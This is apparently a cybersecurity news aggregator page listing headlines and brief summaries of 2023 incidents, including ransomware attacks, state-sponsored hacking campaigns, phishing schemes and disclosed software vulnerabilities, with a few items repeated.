Last week, CISA warned organizations about critical and high-severity vulnerabilities in a human-machine interface (HMI) product made by Taiwan-based Weintek. According to CISA, the impacted product, the Weintek cMT HMI, is used worldwide, including in critical manufacturing organizations, which are considered part of critical infrastructure.

Is It On or Off? Cisco IOS XE Devices Hacked in Widespread Attacks

Amid the COVID-19 pandemic, as remote work became a necessity, IT teams had to rapidly implement protocols and software suites to maintain business continuity and efficiency. This involved enabling routing configurations and adjusting inbound and outbound policies on appliances that previously didn't support remote connections. This allowed networking appliances and software packages to be accessed and configured on-the-fly, enabling staff to access the necessary resources for their work from locations outside the traditional office spaces.

Russian Sandworm Hackers Breached 11 Ukrainian Telcos Since May

The state-sponsored Russian hacking group tracked as 'Sandworm' has compromised eleven telecommunication service providers in Ukraine between May and September 2023. That is based on a new report by Ukraine's Computer Emergency Response Team (CERT-UA) citing 'public resources' and information retrieved from some breached providers.

Researchers Warn of Increased Malware Delivery via Fake Browser Updates

Researchers from Sekoia have released details on a new campaign from the threat group behind SocGholish. This latest activity leverages compromised WordPress sites to push malicious fake browser updates. The campaign, which has been called ClearFake, injects Javascript into compromised WordPress websites so that it downloads another Javascript payload from an attacker controlled domain.

Colonial Pipeline Attributes Ransomware Claims to ‘Unrelated’ Third-Party Data Breach

Colonial Pipeline has reported that there has been no disruption to its pipeline operations or systems following threats from a ransomware group known as Ransomed.vc. Colonial Pipeline is responsible for operating the largest pipeline system for refined oil products in the United States. The Ransomed.vc gang claimed that they had stolen data from Colonial Pipeline's systems.

macOS Malware 2023 | A Deep Dive into Emerging Trends and Evolving Techniques

In a recent report by SentinelOne, they've highlighted a noteworthy shift in the behavior of macOS malware. The trend we're observing is a move away from the concept of persistence, particularly in many malware families. Specifically, infostealers have taken center stage, aiming to accomplish their objectives in a single execution. This includes the theft of valuable data such as admin passwords, browsing history, and cookies, all achieved without relying on traditional methods of maintaining persistence.

Women Political Leaders Summit Targeted in Romcom Malware Phishing

A less detectable version of the RomCom backdoor was used to target attendees of the Women Political Leaders Summit in Brussels, which centers on gender equality and women in politics. The attackers created a fake website resembling the official WPL portal to lure individuals looking to participate or learn about the summit.

EPA Calls Off Cyber Regulations for Water Sector

The Environmental Protection Agency will no longer require cybersecurity audits of U.S. water utilities through sanitary surveys. “In a letter to state drinking water administrators on Thursday, the EPA said litigation from Republican states and trade associations, which raised questions about the long-term legal viability of the initiative to regulate the cybersecurity of water utilities, drove the decision to rescind a March memorandum implementing the rule.

Ransomware Attacks Now Target Unpatched WS_FTP Servers

Internet-exposed WS_FTP servers unpatched against a maximum severity vulnerability are now targeted in ransomware attacks. As recently observed by Sophos X-Ops incident responders, threat actors self-described as the Reichsadler Cybercrime Group attempted, unsuccessfully, to deploy ransomware payloads created using a LockBit 3.0 builder stolen in September 2022.

DarkGate Malware Spreading via Messaging Services Posing as PDF Files

The DarkGate malware is being spread through messaging platforms like Skype and Microsoft Teams. It disguises itself as a PDF document, but contains a harmful script that downloads and runs the malware. It’s uncertain how the attackers compromised the messaging app accounts, but it’s suspected to be due to leaked credentials or a previous compromise of the organization.

Newest Ransomware Trend: Attackers Move Faster with Partial Encryption

In a recent report from Check Point, it was observed that ransomware actors can rapidly incapacitate systems through partial encryption. You might be wondering, what is partial encryption and why is it effective? Generally, encryption, especially for large data volumes, can be a time-consuming process. Consequently, attackers are seeking more efficient and effective methods to make victims' data inaccessible until the ransom is paid.

Assessed Cyber Structure and Alignments of North Korea in 2023

North Korea’s state-sponsored hackers, under the direction of its ruling regime, are constantly improving their tactics for conducting cyber operations. This information comes from a recent report by Google’s Mandiant threat intelligence team. The report reveals how the Pyongyang-based regime, despite its small population of 25 million, utilizes cyber intrusions for both espionage and financial crimes, thereby bolstering its power and financing its cyber and kinetic capabilities.

A Frontline Report of Chinese Threat Actor Tactics and Techniques

Microsoft threat intelligence experts are seeing a trend of Chinese threat groups deploying less desktop malware and prioritizing in stealing passwords and tokens that can be used to access sensitive systems used by remote workers. Ever since the COVID-19 pandemic, work from home has become a norm with organizations granting employees remote access to sensitive systems and resources.

LinkedIn Smart Links Attacks Return to Target Microsoft Accounts

Cofense has detected a surge in the abuse of LinkedIn Smart Links in phishing attacks allowing actors to bypass protection measures and evade detection. “Smart Links are part of LinkedIn's Sales Navigator service, used for marketing and tracking, allowing Business accounts to email content using trackable links to determine who engaged with it.

AvosLocker Ransomware Continues to Target US - CISA Alert AA23-284A

On October 11, 2023, The Cybersecurity and Infrastructure Security Agency (CISA) released a joint advisory on AvosLocker ransomware. AvosLocker is a Ransomware-as-a-Service group that employs double extortion tactics in their ransomware attack campaigns. AvosLocker was first seen in June 2021, and they have multiple ransomware variants for Windows, Linux, and VMware ESXi environments.

LinkedIn Smart Links Attacks Return to Target Microsoft Accounts

Cofense has detected a surge in the abuse of LinkedIn Smart Links in phishing attacks allowing actors to bypass protection measures and evade detection. “Smart Links are part of LinkedIn's Sales Navigator service, used for marketing and tracking, allowing Business accounts to email content using trackable links to determine who engaged with it. Also, because Smart Link uses LinkedIn's domain followed by an eight-character code parameter, they appear to originate from a trustworthy source and bypass email protections” .

AvosLocker Ransomware Continues to Target US - CISA Alert AA23-284A

On October 11, 2023, The Cybersecurity and Infrastructure Security Agency (CISA) released a joint advisory on AvosLocker ransomware. AvosLocker is a Ransomware-as-a-Service group that employs double extortion tactics in their ransomware attack campaigns. AvosLocker was first seen in June 2021, and they have multiple ransomware variants for Windows, Linux, and VMware ESXi environments.

High Severity Vulnerability in curl 8.4.0

Last week, researchers warned of a critical flaw in curl, the popular command line transfer tool. Curl project founder and lead developer Daniel Stenberg called it “probably the worst curl security flaw in a long time.” While details were initially withheld, a patch released today fixed two separate vulnerabilities tracked as CVE-2023-38545 and CVE-2023-38546.

One-Click Exploit Reveals Common Software's Supply Chain Risk in Linux Operating Systems

Researchers from GitHub security lab have discovered a critical vulnerability in a library used within the GNOME desktop environment for Linux systems. GNOME is a popular open-source desktop environment found in distributions like Ubuntu and Fedora. The vulnerability, rated 8.8 out of 10, resides in a library called "libcue," which is used for parsing metadata related to CD or DVD track layouts.

Google Mitigated the Largest DDoS Attack to Date, Peaking Above 398 Million RPS

Google says it mitigated a series of DDoS attacks reaching a peak of 398 million requests per second (rps), which is nearly 9 times bigger than the largest-recorded DDoS attack last year, peaking at 46 million rps. The latest set of attacks started in August and are still ongoing. According to Google, the attacks rely on a novel technique dubbed “Rapid Reset” which leverages stream multiplexing, a feature of the widely-adopted HTTP/2 protocol.

Microsoft to kill off VBScript in Windows to block malware delivery

Microsoft says it is in the works of removing VBScript (Visual Basic Script), a scripting language that was introduced by the tech giant approximately 30 years ago. Although VBScript was originally designed for Windows automation and administrative tasks, over the years, threat actors have misused it to create and distribute malicious payloads.

New Threat Actor “Grayling” Blamed For Espionage Campaign

Security researchers have revealed evidence of a newly discovered APT group that primarily targeted Taiwanese organizations during a cyber-espionage campaign spanning at least four months. Known as "Grayling" according to Symantec, this group initiated their operations in February 2023 and persisted until at least May 2023.

Phishing Scam Alert - Impersonation of USPS and Dozens of National Postal Services

As we approach the holiday season, we've remained vigilant in warning our members about the recent surge in phishing attacks targeting U.S. Postal Service (USPS) customers. These malicious campaigns are disseminated through SMS, email, and various other phishing methods. In these attacks, criminals impersonate USPS services with the intent to deceive individuals and pilfer personal and financial information.

Microsoft Releases New Report on Cybercrime, State-Sponsored Cyber Operations

According to Microsoft’s latest Digital Defense Report, Ukraine, the United States, and Israel were the most targeted countries based on state-sponsored threat activity observed by the tech giant against organizations in more than 120 countries. Based on intel gathered between July 2022 and June 2023, the majority of cyber attacks observed were fueled by nation-state spying and influence operations, with 40% of all observed attacks targeting critical infrastructure organizations.

D.C. Board of Elections Confirms Voter Data Stolen in Site Hack

The District of Columbia Board of Elections (DCBOE) is currently probing a data leak involving an unknown number of voter records following breach claims from a threat actor known as RansomedVC. DCBOE operates as an autonomous agency within the District of Columbia Government and is entrusted with overseeing elections, managing ballot access, and handling voter registration processes.

Hackers Hijack Citrix NetScaler Login Pages to Steal Credentials

Hackers are conducting a large-scale campaign to exploit the recent CVE-2023-3519 flaw in Citrix NetScaler Gateways to steal user credentials. The flaw is a critical unauthenticated remote code execution bug discovered as a zero-day in July that impacts Citrix NetScaler ADC and NetScaler Gateway. By early August, the flaw had been leveraged to backdoor at least 640 Citrix servers, and the figure reached 2,000 by mid-August.

NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations

The UK's National Cyber Security Centre (NCSC) has released guidance to assist medium to large organizations in mapping their supply chains, with a focus on boosting confidence in managing vulnerabilities related to suppliers. Additionally, a report by Picus Security highlights the growing prevalence of multipurpose malware, which possesses multiple functionalities.

GitHub's Secret Scanning Feature Now Covers AWS, Microsoft, Google, and Slack

GitHub recently updated its secret scanning feature to extend validity checks to popular services including Amazon Web Services (AWS), Microsoft, Google, and Slack. The feature was introduced earlier this year to help alert users whether exposed tokens found by the secret scanning are active. While the feature was first enabled for GitHub tokens, the cloud-based code hosting and version control service is now including support for more tokens.

Sony Confirms Data Breach Impacting Thousands in the U.S.

Sony Interactive Entertainment (Sony) has informed both current and former employees and their family members regarding a cybersecurity incident that resulted in the exposure of personal information. The company has dispatched data breach notifications to approximately 6,800 individuals, verifying that the breach transpired due to an unauthorized entity exploiting a zero-day vulnerability in the MOVEit Transfer platform.

Maritime Infrastructure Security Breaches from Drones ‘Becoming a Common Occurrence,’ Says Report

A recent report highlights the growing presence of drones above sensitive maritime facilities, signaling a common occurrence. The report also criticizes the effectiveness of current federal counter-UAS legislation, citing a lack of authorities and capabilities to intercept suspicious drones. U.S. Coast Guard Capt. Andrew J. Meyers emphasized the importance of Area Maritime Security Committees (AMSCs) in safeguarding the nation's ports, praising their role in fostering relationships, collaborative planning, communication, and unity of effort.

Exploits Released for Linux Flaw Giving Root on Major Distros

Proof-of-concept exploits have already surfaced online for a high-severity flaw in GNU C Library's dynamic loader, allowing local attackers to gain root privileges on major Linux distributions. Dubbed 'Looney Tunables' and tracked as CVE-2023-4911, this security vulnerability is due to a buffer overflow weakness, and it affects default installations of Debian 12 and 13, Ubuntu 22.04 and 23.04, and Fedora 37 and 38.

Atlassian Confluence Hit by New Actively Exploited Zero-Day – Patch Now

Atlassian has published security updates to fix an actively exploited zero-day vulnerability in its Confluence Data Center and Server software. Tracked as CVE-2023-22515, the flaw relates to a case of privilege escalation. Although Atlassian did not specify the root cause of this flaw, the vulnerability could allow a regular user account to elevate to admin.

US Executives Targeted in Phishing Attacks Exploiting Flaw in Indeed Job Platform

In a recent report from Menlo Security, it was discovered that Indeed, a widely recognized global job search platform headquartered in the US, boasting over 350 million monthly visitors and a global workforce of more than 14,000 employees, has become the focus of a significant phishing campaign. This campaign underscores how threat actors can exploit the platform's credibility and popularity.

EvilProxy Uses Indeed.com Open Redirect For Microsoft 365 Phishing

A recently uncovered phishing campaign is targeting Microsoft 365 accounts of key executives in U.S.-based organizations by abusing open redirects from the Indeed employment website for job listings. The threat actor is using the EvilProxy phishing service that can collect session cookies, which can be used to bypass multi-factor authentication (MFA) mechanisms.

New BunnyLoader Threat Emerges as a Feature-Rich Malware-As-A-Service

Security researchers discovered a new malware-as-a-service (MaaS) named 'BunnyLoader' advertised on multiple hacker forums as a fileless loader that can steal and replace the contents of the system clipboard. The malware is under rapid development, with updates adding new features and bug fixes. It can currently download and execute payloads, log keys, steal sensitive data and cryptocurrency, and execute remote commands.

Ransomware Reinfections on the Rise Due to Improper Remediation

According to a recent report from Malwarebytes, it was found that ransomware attacks don't typically originate as a fresh problem for organizations; instead, they are the grim culmination of unresolved network compromises. Threat actors gain initial access through stolen login credentials, deployed malware, or established backdoors—akin to leaving an unlocked door for future visits.

Malware-Infected Devices Sold Through Major Retailers

Human Security has exposed a significant monetization method employed by a sophisticated cyber-criminal operation. This operation involved the sale of backdoored off-brand mobile and CTV (Connected TV) Android devices through major retailers, which had originated from repackaging factories in China.

FBI Warns of Surge in 'Phantom Hacker' Scams Impacting Elderly

The FBI issued a public service announcement warning of a significant increase in 'phantom hacker' scams targeting senior citizens across the United States. ‘This Phantom Hacker scam is an evolution of more general tech support scams, layering imposter tech support, financial institution, and government personas to enhance the trust victims place in the scammers and identify the most lucrative accounts to target,’ the FBI said.

Ransomware Gangs Now Exploiting Critical TeamCity RCE Flaw

Ransomware gangs are now targeting a recently patched critical vulnerability in JetBrains' TeamCity continuous integration and deployment server. The flaw (tracked as CVE-2023-42793 and tagged with a 9.8/10 severity score) allows unauthenticated attackers to gain remote code execution (RCE) after successfully exploiting an authentication bypass weakness in low-complexity attacks that don't require user interaction.

Future Government Shutdowns: Potential Impact on National Cybersecurity

In a recent report from Forbes, the nation's cybersecurity was in a tight spot when Congress passed a bill to keep the government running for the next 45 days. A government shutdown could have caused problems for many government functions, including those responsible for protecting the country from cyberattacks. Depending on how long the shutdown lasted, it could have led to a crisis for companies and organizations across the country.

Microsoft Edge, Teams Get Fixes for Zero-days in Open-source Libraries

Microsoft released emergency security updates for Edge, Teams, and Skype to patch two zero-day vulnerabilities in open-source libraries used by the three products. The first bug is a flaw tracked as CVE-2023-4863 and is caused by a heap buffer overflow weakness in the WebP code library (libwebp), whose impact ranges from crashes to arbitrary code execution.

Strengths and Weaknesses of a Single-Vendor Approach: Microsoft

In a recent report by SentinelOne, it's highlighted that Microsoft's security business has seen substantial growth, generating over $20 billion annually. The International Data Corporation (IDC) reported that Microsoft holds the largest market share in 2022, at 18.9%, with a 7.2% increase. Similarly, Gartner estimated that in 2021, Microsoft controlled 8.5% of the entire security software market, outperforming its competitors.

Chinese Threat Actors Stole Around 60,000 Emails from US State Department in Microsoft Breach - Filing

This report was filed under "Vendor Reports" because it was investigated by Microsoft (being the vendor) as a notable incident, "Microsoft researchers discovered that the threat actors gained access to customer email accounts using Outlook Web Access in Exchange Online (OWA) and Outlook[.]com by forging authentication tokens to access user email." Microsoft corrected the issue in its products by, "Revoking all valid MSA signing keys to prevent attackers from accessing other compromised keys."

Zanubis Android Banking Trojan Poses as Peruvian Government App to Target Users

An emerging Android banking trojan called Zanubis is now masquerading as a Peruvian government app to trick unsuspecting users into installing the malware. ‘Zanubis's main infection path is through impersonating legitimate Peruvian Android applications and then tricking the user into enabling the Accessibility permissions in order to take full control of the device,’ Kaspersky said in an analysis published last week.

Millions of Exim Mail Servers Exposed to Zero-Day RCE Attacks

A critical zero-day vulnerability was disclosed in the Exim mail transfer agent (MTA) software, which if successfully exploited could enable an unauthenticated attacker to gain remote code execution on Internet-exposed servers. Tracked as CVE-2023-42115, the flaw resides in the SMTP service, which listens on TCP port 25 by default. According to Trend Micro’s Zero Day Initiative, which uncovered the flaw, CVE-2023-42115 results from a lack of proper validation of user-supplied data which could result in a write past the end of a buffer and further allow an attacker to execute code in the context of the service account.

Exploit Available for Critical WS_FTP Bug Exploited in Attacks

Over the weekend, security researchers uncovered a critical vulnerability (CVE-2023-40044) in Progress Software's WS_FTP Server. They released a proof-of-concept (PoC) exploit along with technical details. The flaw stems from a .NET deserialization vulnerability in the Ad Hoc Transfer Module, allowing unauthenticated attackers to execute remote commands via a simple HTTP request. Assetnote researchers, who discovered the issue, expressed surprise at how long it remained unpatched.

Exploit Released for Microsoft SharePoint Server Authentication Bypass Flaw

Proof-of-concept exploit code has surfaced on GitHub for a critical authentication bypass vulnerability in Microsoft SharePoint Server, allowing privilege escalation. Tracked as CVE-2023-29357, the security flaw can let unauthenticated attackers gain administrator privileges following successful exploitation in low-complexity attacks that don't require user interaction.

Hackers Steal User Database from European Telecommunications Standards Body

Hackers targeted the European Telecommunications Standards Institute (ETSI), a nonprofit organization responsible for developing communication standards, and stole a user database. The motive behind the attack remains unclear, with suspicions ranging from financial gain to potential espionage. ETSI engaged France's cybersecurity agency ANSSI to investigate and enhance its information systems' security.

Chinese Threat Actors Stole Around 60,000 Emails from US State Department in Microsoft Breach

China-linked hackers breached Microsoft's email platform in May and stole tens of thousands of emails from U.S. State Department accounts, according to a Senate staffer. During a briefing by State Department IT officials, it was revealed that threat actors targeted around 60,000 emails from a total of 10 State Department accounts belonging to officials working in East Asia, the Pacific, and Europe.

Budworm Hackers Target Telcos and Govt Orgs With Custom Malware

A Chinese cyber-espionage group known as Budworm has recently been detected engaging in cyberattacks. They have specifically targeted a telecommunications company in the Middle East and a government organization in Asia. What's noteworthy is that they've deployed a new version of their customized 'SysUpdate' malware.

Google Fixes Fifth Actively Exploited Chrome Zero-Day of 2023

Yesterday, Google released emergency security updates to address a zero-day flaw impacting its Chrome Browser. Tracked as CVE-2023-5217, the flaw relates to a heap buffer overflow weakness in the VP8 encoding of libvpx, an open-source video codec library from Google and the Alliance for Open Media (AOMedia). A successful exploit of this flaw could lead to browser crashes or arbitrary code execution.

Cisco Urges Admins to Fix IOS Software Zero-Day Exploited in Attacks

Multiple vulnerabilities have been identified in Cisco Catalyst SD-WAN Manager (formerly Cisco SD-WAN vManage). These vulnerabilities could potentially allow attackers to access an affected instance or cause a denial of service (DoS) condition on the affected system. Cisco has taken action to address these vulnerabilities through software updates, "Although exploiting this vulnerability demands significant access to the target environment, threat actors have already initiated attacks, as reported by the company in the same advisory.

US and Japan Warn of Chinese Hackers Backdooring Cisco Routers

US and Japanese law enforcement and cybersecurity agencies warn of the Chinese 'BlackTech' hackers breaching network devices to install custom backdoors for access to corporate networks. The joint report comes from the FBI, NSA, CISA, and the Japanese NISC (cybersecurity) and NPA (police), who explain that the state-sponsored hacking group is breaching network devices at international subsidiaries to pivot to the networks of corporate headquarters.

GitHub Repos Bombarded By Info-Stealing Commits Masked as Dependabot

Hackers are breaching GitHub accounts and inserting malicious code disguised as Dependabot contributions to steal authentication secrets and passwords from developers. The campaign unfolded in July 2023, when researchers discovered unusual commits on hundreds of public and private repositories forged to appear as Dependabot commits.

New ZenRAT Malware Targeting Windows Users via Fake Password Manager Software

Researchers at Proofpoint have uncovered a new malware strain dubbed ZenRAT which is being distributed via bogus installation packages of the Bitwarden password manager. ZenRAT is a modular remote access trojan that comes with various modules designed to steal information from victims’ systems. Although researchers noted that ZenRAT is being hosted on fake websites pretending to be associated with Bitwarden, it’s unclear how end users are being directed to these sites.

New Zerofont Phishing Tricks Outlook Into Showing Fake AV-Scans

Threat actors are employing a novel tactic by incorporating zero-point fonts within emails, creating the illusion that malicious emails have undergone successful security scans in Microsoft Outlook. While the ZeroFont phishing method has been previously observed, its current application marks a significant development. ISC Sans analyst Jan Kopriva, in a recent report, cautions that this technique could greatly enhance the success rate of phishing attacks, underscoring the importance of user awareness regarding its deployment in real-world scenarios.

Shadowsyndicate Hackers Linked to Multiple Ransomware Ops, 85 Servers

Security researchers have identified ShadowSyndicate as a threat actor using seven ransomware families in attacks over the past year. They suggest it could be an initial access broker and affiliate to ransomware operations. Their findings are based on a distinct SSH fingerprint found on 85 IP servers, discovered using tools like Shodan and Censys. This fingerprint was first seen in July 2022 and still in use in August 2023. Researchers also found eight different Cobalt Strike watermarks on ShadowSyndicate servers.

BORN Ontario child registry data breach affects 3.4 million people

The Better Outcomes Registry & Network (BORN), a healthcare organization funded by the government of Ontario, has announced that it is among the victims of Clop ransomware's MOVEit hacking spree. BORN is a perinatal and child registry that collects, interprets, shares and protects critical data about pregnancy, birth and childhood in the province of Ontario.

Ukrainian Military Targeted in Phishing Campaign Leveraging Drone Manuals

Ukrainian military entities are the target of a phishing campaign that leverages drone manuals as lures to deliver a Go-based open-source post-exploitation toolkit called Merlin. ‘Since drones or Unmanned Aerial Vehicles (UAVs) have been an integral tool used by the Ukrainian military, malware-laced lure files themed as UAVs service manuals have begun to surface," Securonix researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a report shared with The Hacker News.

New Stealthy and Modular Deadglyph Malware Used in Govt Attacks

A highly advanced backdoor malware called 'Deadglyph' was recently employed in a cyber espionage operation targeting a Middle Eastern government agency. This sophisticated malware, known as Deadglyph, has been linked to the Stealth Falcon Advanced Persistent Threat (APT) group, also known as Project Raven or FruityArmor.

Is Gelsemium APT Behind a Targeted Attack in Southeast Asian Government?

Researchers at Kaspersky Lab have uncovered a new backdoor called "SessionManager" that has been used in attacks targeting Microsoft IIS Servers since March 2021. This backdoor allows threat actors to maintain persistent, update-resistant, and stealthy access to a targeted organization's IT infrastructure. It has been deployed in over 20 organizations, and as of late April 2022, many samples were not yet flagged as malicious by online file scanning services.

Dallas says Royal Ransomware Breached its Network Using Stolen Account

The City of Dallas, Texas, said this week that the Royal ransomware attack that forced it to shut down all IT systems in May started with a stolen account. Royal gained access to the City's network using a stolen domain service account in early April and maintained access to the compromised systems between April 7 and May 4. During this period, they successfully collected and exfiltrated 1.169 TB worth of files based on system log data analysis conducted by city officials and external cybersecurity experts.

Chinese Malware Appears in Earnest Across Cybercrime Threat Landscape

Proofpoint has observed an increase in activity from specific malware families targeting Chinese-language speakers. Campaigns include Chinese-language lures and malware typically associated with Chinese cybercrime activity. Newly observed ValleyRAT is emerging as a new malware among Chinese-themed cybercrime activity, while Sainbox RAT and related variants are recently active as well.

Pro-Russia Hacker Group NoName Launched a DDoS Attack on Canadian Airports Causing Severe Disruption

Pro-Russia hacker group NoName is suspected of launching a DDoS cyberattack that caused significant disruptions at several Canadian airports. The attack affected check-in kiosks and electronic gates, leading to delays in the processing of arrivals at border checkpoints across the country. The Canada Border Services Agency (CBSA) confirmed the DDoS attack and is investigating the incident, assuring that no personal information has been compromised. No evidence of a data breach has been found at this time.

P2PInfect Botnet Activity Surges 600x with Stealthier Malware Variants

The P2PInfect botnet worm has entered a phase of significantly increased activity, with a notable surge observed from late August through September 2023. Initially documented by Unit 42 in July 2023, P2PInfect is categorized as a peer-to-peer malware that exploits a remote code execution vulnerability to breach Redis instances on internet-exposed Windows and Linux systems.

Cyber Group 'Gold Melody' Selling Compromised Access to Ransomware Attackers

A financially motivated threat actor has been outed as an initial access broker (IAB) that sells access to compromised organizations for other adversaries to conduct follow-on attacks such as ransomware. SecureWorks Counter Threat Unit (CTU) has dubbed the e-crime group Gold Melody, which is also known by the names Prophet Spider (CrowdStrike) and UNC961 (Mandiant).

T-Mobile App Glitch Let Users See Other People's Account Info

Today, T-Mobile customers said they could see other peoples' account and billing information after logging into the company's official mobile application. According to user reports on social media, the exposed information included customers' names, phone numbers, addresses, account balances, and credit card details like the expiration dates and the last four digits.

GitLab Releases Urgent Security Patches for Critical Vulnerability

GitLab recently rolled out security updates to address a critical vulnerability impacting its enterprise edition. Tracked as CVE-2023-5009, the flaw could enable an attacker to run pipelines as an arbitrary user via scheduled security scan policies. As such, the actor could use elevated permissions of the impersonated user to further access sensitive information, modify source code, or even run arbitrary code on the targeted system.

Finnish Authorities Dismantle Notorious PIILOPUOTI Dark Web Drug Marketplace

Finnish law enforcement authorities have announced the takedown of PIILOPUOTI, a dark web marketplace that specialized in illegal narcotics trade since May 2022. ‘The site operated as a hidden service in the encrypted TOR network,’ the Finnish Customs (aka Tulli) said in a brief announcement on Tuesday. ‘The site has been used in anonymous criminal activities such as narcotics trade.’

Fake WinRAR Proof-of-Concept Exploit Drops VenomRAT Malware

Threat actors exploited a recently disclosed WinRAR vulnerability (CVE-2023-40477) by repurposing an older proof-of-concept (PoC) code. The Zero Day Initiative initially reported the WinRAR vulnerability to the vendor on June 8, 2023, but publicly disclosed it on August 17, 2023. Within four days of the public disclosure, an actor known as "whalersplonk" uploaded a fake PoC script to their GitHub repository.

Snatch Ransomware Alert

Snatch is a ransomware group primarily targeting Windows-based systems. They employ various tactics, including exploiting vulnerabilities, brute force attacks, and data exfiltration to compromise and extort victims. Snatch operates under a ransomware-as-a-service (RaaS) model and has targeted critical infrastructure sectors such as Defense Industrial Base (DIB), Food and Agriculture, and Information Technology.

ShroudedSnooper Threat Actors Target Telecom Companies in the Middle East

Telecommunications companies have increasingly become the focus of state-sponsored actors and advanced adversaries in recent years. In 2022, the telecommunications sector consistently ranked as one of the most targeted verticals in Talos IR (Incident Response) engagements. Telecom companies control critical infrastructure assets, which make them attractive targets for adversaries seeking to create significant disruptions.

Trend Micro Fixes Endpoint Protection Zero-day Used in Attacks

Trend Micro fixed a remote code execution zero-day vulnerability in the Trend Micro's Apex One endpoint protection solution that was actively exploited in attacks. Apex One is an endpoint security solution catering to businesses of all sizes, and the 'Worry-Free Business Security' suite is designed for small to medium-sized companies.

Earth Lusca Expands Arsenal with SprySocks Linux Malware

China-linked threat group Earth Lusca has deployed a new Linux malware called SprySOCKS in a recent cyber espionage campaign. Researchers at Trend Micro discovered this malware while tracking Earth Lusca's activities. SprySOCKS, based on an open-source Windows backdoor called Trochilus, was adapted for Linux. Earth Lusca continues to develop it, as evidenced by different versions detected.

Bumblebee Malware Returns in New Attacks Abusing WebDAV Folders

The malware loader 'Bumblebee' has broken its two-month vacation with a new campaign that employs new distribution techniques that abuse 4shared WebDAV services. WebDAV (Web Distributed Authoring and Versioning) is an extension of the HTTP protocol that enables clients to perform remote authoring operations such as creating, accessing, updating, and deleting web server content.

Microsoft AI Researchers Accidentally Expose 38 Terabytes of Confidential Data

Microsoft on Monday said it took steps to correct a glaring security gaffe that led to the exposure of 38 terabytes of private data. The leak was discovered on the company's AI GitHub repository and is said to have been inadvertently made public when publishing a bucket of open-source training data, Wiz said. It also included a disk backup of two former employees' workstations containing secrets, keys, passwords, and over 30,000 internal Teams messages.

New AMBERSQUID Cryptojacking Operation Targets Uncommon AWS Services

A new cloud-native cryptojacking operation, known as AMBERSQUID, is targeting less common AWS services like AWS Amplify, AWS Fargate, and Amazon SageMaker for illicit cryptocurrency mining. Sysdig, a security firm, identified this campaign while analyzing 1.7 million Docker Hub images and attributed it to Indonesian attackers due to their use of the Indonesian language in scripts and usernames.

FBI Hacker USDOD Leaks Highly Sensitive TransUnion Data

“Researchers at vx-underground have uncovered a major data breach involving the hacker known as "USDoD," who leaked highly sensitive data from TransUnion, a leading consumer credit reporting agency. The breach exposed personal information of 58,505 individuals globally, including names, passport details, financial data, and more, dating back to March 2022.

Canadian Government Targeted With DDoS Attacks by Pro-Russia Group

The pro-Russian cybercrime group named NoName057(16) has been observed launching distributed denial-of-service (DDoS) attacks against Canadian organizations, a fresh government alert warns. Since March 2022, the threat actor – also known as NoName05716, 05716nnm or Nnm05716 – has been launching disruptive attacks in support of Russia’s invasion of Ukraine.

BlackCat Ransomware Hits Azure Storage with Sphynx Encryptor

The BlackCat (ALPHV) ransomware gang now uses stolen Microsoft accounts and the recently spotted Sphynx encryptor to encrypt targets' Azure cloud storage. While investigating a recent breach, Sophos X-Ops incident responders discovered that the attackers used a new Sphynx variant with added support for using custom credentials. After gaining access to the Sophos Central account using a stolen One-Time Password (OTP), they disabled Tamper Protection and modified the security policies

Iranian Hackers Breach Defense Orgs in Password Spray Attacks

Since February 2023, Microsoft has reported that an Iranian-backed threat group known as APT33 (or Peach Sandstorm, HOLMIUM, Refined Kitten) has been conducting password spray attacks against thousands of organizations in the U.S. and globally. These attacks involve attempting to access multiple accounts using a single or commonly used password, increasing the chances of success without triggering account lockouts.

ORBCOMM Ransomware Attack Causes Trucking Fleet Management Outage

Trucking and fleet management solutions provider ORBCOMM has confirmed that a ransomware attack is behind recent service outages preventing trucking companies from managing their fleets. ORBCOMM is a solutions provider for freight companies to manage fleets and track transported assets. The company also provides Electronic Logging Devices (ELD) that truckers use to log their hours to adhere to federal safety regulations.

NodeStealer Malware Now Targets Facebook Business Accounts on Multiple Browsers

An ongoing campaign is targeting Facebook Business accounts with bogus messages to harvest victims' credentials using a variant of the Python-based NodeStealer and potentially take over their accounts for follow-on malicious activities. ‘The attacks are reaching victims mainly in Southern Europe and North America across different segments, led by the manufacturing services and technology sectors.

Pirated Software Likely Cause of Airbus Breach

A major data breach at Airbus revealed earlier this week stemmed from a RedLine info-stealer likely hidden in a pirated copy of Microsoft software, according to researchers. The European aerospace giant said it has launched an investigation into the incident.

Enterprises Persist with Outdated Authentication Strategies

Despite authentication being a cornerstone of cybersecurity, risk mitigation strategies remain outdated, according to new research from Enzoic. With the attack surface expanding and the increasing sophistication of cyber threats, organizations are struggling to deliver secure and user-friendly authentication. The research uncovered that despite the emergence of modern strategies, most companies still rely on traditional approaches.

Scattered Spider Behind MGM Cyberattack, Targets Casinos

The "Scattered Spider" threat group is believed to be responsible for the cyberattack on MGM Resorts that occurred on September 10. This attack has left systems offline in over 30 hotels and casinos owned by the conglomerate worldwide, and the disruption continues even days later. As reported by Reuters, the Scattered Spider ransomware group, as identified by sources familiar with the situation, is believed to consist of young individuals based in the US and UK.

Russian Journalist's iPhone Compromised by NSO Group's Zero-Click Spyware

The iPhone belonging to Galina Timchenko, a prominent Russian journalist and critic of the government, was compromised with NSO Group's Pegasus spyware, a new collaborative investigation from Access Now and the Citizen Lab has revealed. The infiltration is said to have happened on or around February 10, 2023. Timchenko is the executive editor and owner of Meduza, an independent news publication based in Latvia.

Update Adobe Acrobat and Reader to Patch Actively Exploited Vulnerability

Adobe recently addressed a critical flaw in Acrobat and Reader that could enable actors to execute malicious code on targeted systems. Tracked as CVE-2023-26369, the vulnerability has been rated 7.8 out of 10 on the CVSS scale, indicating a high level of severity. According to the vendor, CVE-2023-26369 relates to an out-of-bounds write issue and can be exploited to execute arbitrary code via specially crafted PDF documents.

Suspected Ransomware Attack Hits Auckland Transport's Hop Cards

Auckland Transport's Hop card system has been hit by a suspected ransomware attack, leading to disruptions in card top-up services and limited functionality at customer service centers. The attack is under investigation, and there is no indication that personal or financial data has been compromised. Commuters can still use their cards to tag on and off, but online top-ups and services on the AT website are unavailable.

Kubernetes Flaws Could Lead to Remote Code Execution on Windows Endpoints

